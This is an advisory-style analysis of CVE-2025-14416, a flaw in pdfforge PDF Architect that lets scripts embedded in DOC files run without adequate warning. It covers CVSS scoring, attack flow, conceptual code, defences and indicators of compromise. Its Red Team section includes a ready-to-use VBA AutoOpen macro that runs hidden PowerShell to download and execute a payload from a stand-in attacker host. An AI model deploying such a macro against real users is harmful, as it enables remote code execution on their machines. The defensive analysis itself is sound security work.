Executive Summary

CVE-2025-14416 is a remote code execution vulnerability in pdfforge PDF Architect, a popular PDF editing and document management suite. The flaw resides in the processing of Microsoft Word (DOC) files. When a user opens a malicious DOC file, the application fails to display an adequate security warning before executing potentially dangerous script content embedded within the document. This allows an attacker to execute arbitrary code in the context of the current user without sufficient user awareness.

The vulnerability was reported through the Zero Day Initiative (ZDI-CAN-27503) and carries a CVSS score of 7.0 (High). User interaction is required—the victim must open a malicious DOC file or visit a malicious page that triggers the file download. No public exploit code or proof-of-concept is currently available, but the risk is elevated due to the lack of a vendor patch.

Note: This is not a WordPress plugin vulnerability; it is a desktop application flaw in pdfforge PDF Architect.

Supply Chain & Package Security

This vulnerability does not affect NPM, PyPI, Go, or Ruby packages. It is a standalone desktop application vulnerability. No supply chain implications are identified.

CVSS Breakdown & Threat Level

  • Attack Vector (AV): Network (N) – The attacker can deliver the malicious DOC file remotely.
  • Attack Complexity (AC): Low (L) – No special conditions required beyond user interaction.
  • Privileges Required (PR): None (N) – No authentication needed.
  • User Interaction (UI): Required (R) – The victim must open the file.
  • Scope (S): Unchanged (U) – The exploit affects the same security authority.
  • Confidentiality (C): High (H) – Full data access possible.
  • Integrity (I): High (H) – Code execution allows modification.
  • Availability (A): High (H) – Potential for denial of service or system compromise.

Threat Level: High. Despite the requirement for user interaction, the lack of a patch and the ability to execute arbitrary code make this a critical risk for organizations using PDF Architect.

Deep Dive & Mechanics

The vulnerability is rooted in how PDF Architect handles DOC file imports. When a user opens a DOC file, the application parses the document structure. If the DOC file contains embedded scripts (e.g., VBA macros, OLE objects, or other executable content), PDF Architect should display a security warning to the user before executing any dangerous content. However, due to a flaw in the UI warning mechanism, the application either suppresses the warning or fails to properly evaluate the risk, allowing the script to execute automatically.

Attack Flow:

  1. Attacker crafts a malicious DOC file containing embedded script (e.g., VBA macro that downloads and executes a payload).
  2. Attacker hosts the file on a website or sends it via email.
  3. Victim opens the DOC file with PDF Architect.
  4. PDF Architect processes the file without displaying a sufficient security warning.
  5. The embedded script executes in the context of the current user, allowing arbitrary code execution.

The vulnerability is classified under CWE-356 (Insufficient UI Warning of Dangerous Operations). The application fails to adequately warn the user before performing a dangerous action (executing script from a DOC file).

Vulnerable vs. Patched Code

Since no official patch is available, a direct code comparison is not possible. However, the vulnerable behavior can be described:

Vulnerable Code (Conceptual):

// PDF Architect DOC processing logic (simplified)
void ProcessDocFile(string filePath) {
    DocDocument doc = DocParser.Parse(filePath);
    if (doc.ContainsScript()) {
        // Missing or insufficient warning
        // Script is executed without user consent
        doc.ExecuteScripts();
    }
}

Patched Code (Expected):

void ProcessDocFile(string filePath) {
    DocDocument doc = DocParser.Parse(filePath);
    if (doc.ContainsScript()) {
        // Display a clear warning dialog
        DialogResult result = ShowWarning("This document contains executable content. Do you want to run it?");
        if (result == DialogResult.Yes) {
            doc.ExecuteScripts();
        } else {
            // Abort execution
            return;
        }
    }
}

The patch would require adding a robust security warning dialog that clearly informs the user of the risk and requires explicit consent before executing any script content.

Exploitation & Lab Setup

Red Team (Exploitation)

No public exploit code is available. However, a proof-of-concept can be developed:

  1. Craft a Malicious DOC File: Use a tool like metasploit or macro_pack to embed a VBA macro that executes a reverse shell or downloads a payload.
  2. Host the File: Place the DOC file on a web server or send it via email.
  3. Deliver to Victim: The victim must open the file with PDF Architect.

Example Macro (VBA):

Sub AutoOpen()
    Dim shell As Object
    Set shell = CreateObject("WScript.Shell")
    shell.Run "powershell -NoP -NonI -W Hidden -Exec Bypass -Command ""IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"""
End Sub

Usage: The attacker would embed this macro into a DOC file using macro_pack or similar tool, then deliver it to the target.

Blue Team (Defense)

  • User Awareness: Train users to avoid opening DOC files from untrusted sources, especially when using PDF Architect.
  • Application Control: Use AppLocker or WDAC to block execution of scripts from untrusted documents.
  • Network Monitoring: Monitor for outbound connections from PDF Architect processes (e.g., pdfarchitect.exe).
  • File Reputation: Use antivirus/EDR solutions that scan DOC files for malicious macros.
  • Disable Script Execution: If possible, configure PDF Architect to disable script execution in DOC files (check application settings).

Indicators of Compromise (IOCs)

  • File Hashes (Example): (No known samples yet)
  • Network Indicators:
    • Outbound connections from pdfarchitect.exe to unknown IPs/domains.
    • HTTP requests to download payloads (e.g., GET /payload.ps1).
  • Process Indicators:
    • pdfarchitect.exe spawning child processes like powershell.exe, cmd.exe, or wscript.exe.
  • Registry/File System:
    • Suspicious files written to %TEMP% or %APPDATA% by PDF Architect.
  • YARA Rule (see Detection Engineering).
